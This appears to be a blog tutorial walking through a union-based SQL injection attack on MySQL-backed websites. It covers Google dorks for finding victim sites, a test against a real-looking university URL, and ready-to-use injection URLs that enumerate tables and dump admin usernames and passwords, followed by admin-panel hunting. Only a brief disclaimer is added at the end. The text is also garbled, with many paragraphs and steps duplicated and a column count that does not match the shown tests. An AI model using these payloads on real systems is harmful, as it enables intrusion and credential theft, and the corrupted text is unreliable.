What a hacker can do with SQL Injection attack?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the MY SQL SERVER
So, here we go.
Step 1: Finding Vulnerable Website
To find vulnerability in any site you can use Google Dorks
Examples:---
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Here is a huge list of Google Dorks Click here to See it
after getting google dorks copy and paste the dork in google u will see lots of sites. open these
sites one by to check for vulnerability
Note
if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
Step 2. Checking The Vulnerability
To check vulnerability in any site simply put ' at the end of the url
like this
www.du.ac.in/index.php?id=4'
sites one by to check for vulnerability
Note
if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
Step 2. Checking The Vulnerability
To check vulnerability in any site simply put ' at the end of the url
like this
www.du.ac.in/index.php?id=4'
If u Got any error just like this then the site vulnerable
You have an error in your SQL syntax; check the manual that corresponds to your MYSQl server version for the right syntax to use near '\'' at line 1Step 3: Finding Number of columns:
Our next step is to find the number of columns present in the target database.
For that replace the single quotes(') with "order by n" statement.
Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".
For eg
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
If you get the error while trying the "x"th number,then no of column is "x-1".
I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
so now x=8 , The number of column is x-1 i.e, 7.
In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:
http://www.victimsite.com/index.php?id=2 order by 1--
Step 4: Find the Vulnerable columns:
Let us find the vulnerable column by trying the query "union select columns_sequence".
For eg:
if the number of columns is 7 ,then the query is as follow:
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7-
it will display this
IT says that column 3 and 7 are vunlerable
Let us take the first vulnerable column '3' . We can inject our query in this column
Step 5: Finding version,database,user
Replace the 3 from the query with "version()"
For eg:
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now, It will display the version as 5.0.1 or 4.3. something like this.
Replace the version() with database() and user() for finding the database,user respectively.
For eg:
Replace the version() with database() and user() for finding the database,user respectively.
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working,then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--
Step 6: Finding the Table NameIf the Database version is 5 or above.
If the version is 4.x, then you have to guess the table names (blind sql injection attack).
Let us find the table name of the database. Replace the 3 with "group_concat(table_name)
and add the "from information_schema.tables where table_schema=database()"
For eg:
If the version is 4.x, then you have to guess the table names (blind sql injection attack).
Let us find the table name of the database. Replace the 3 with "group_concat(table_name)
and add the "from information_schema.tables where table_schema=database()"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables
where table_schema=database()--
where table_schema=database()--
Now it will display the list of table names. Find the table name which is related
with the admin or user.
with the admin or user.
Let us choose the "admin " table.
Step 7: Finding the Column Name
Now replace the "group_concat(table_name) with
the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()--"
with "FROM information_schema.columns WHERE table_name=mysqlchar--
We have to convert the table name to MySql CHAR() string .
Now replace the "group_concat(table_name) with
the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()--"
with "FROM information_schema.columns WHERE table_name=mysqlchar--
We have to convert the table name to MySql CHAR() string .
Install the HackBar addon:
Once you installed the add-on, you can see a toolbar that will look like the following
one. If you are not able to see the Hackbar, then press F9.
Select sql->Mysql->MysqlChar() in the Hackbar.
It will ask you to enter string that you want to convert to MySQLCHAR(). We want
to convert the table name to MySQLChar . In our case the table name is 'admin'.
Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.
Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
one. If you are not able to see the Hackbar, then press F9.
Select sql->Mysql->MysqlChar() in the Hackbar.
It will ask you to enter string that you want to convert to MySQLCHAR(). We want
to convert the table name to MySQLChar . In our case the table name is 'admin'.
Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.
Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns
where table_name=CHAR(97, 100, 109, 105, 110)--
where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of column.
For example: admin,password,admin_id,admin_name,admin_password,active,id
,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,
password..etc..
Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).
Now replace the " from information_schema.columns where table_name=
CHAR(97, 100, 109, 105, 110)" with the "from table_name"
For eg:
For example: admin,password,admin_id,admin_name,admin_password,active,id
,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,
password..etc..
Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).
Now replace the " from information_schema.columns where table_name=
CHAR(97, 100, 109, 105, 110)" with the "from table_name"
For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays the 'column is not found' erro, then try another column name
from the list.
If we got luck, then it will display the data stored in the database depending on your
column name. For instance, username and password column will display the login
credentials stored in the database.
Step 8: Finding the Admin Panel:
Just try with url like:
from the list.
If we got luck, then it will display the data stored in the database depending on your
column name. For instance, username and password column will display the login
credentials stored in the database.
Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
If you got luck ,you will find the admin page using above urls. or you can some
kind of admin finder tools.
kind of admin finder tools.
Warning:
The above post is completely for educational purpose only. Never attempt to follow
the above steps against third-party websites. If you want to learn SQL injection attack
method , then you can learn in safe environment by setup your own lab
The above post is completely for educational purpose only. Never attempt to follow
the above steps against third-party websites. If you want to learn SQL injection attack
method , then you can learn in safe environment by setup your own lab
HOpe u like the tutorial join us and like us on facebook
i like it...
ReplyDelete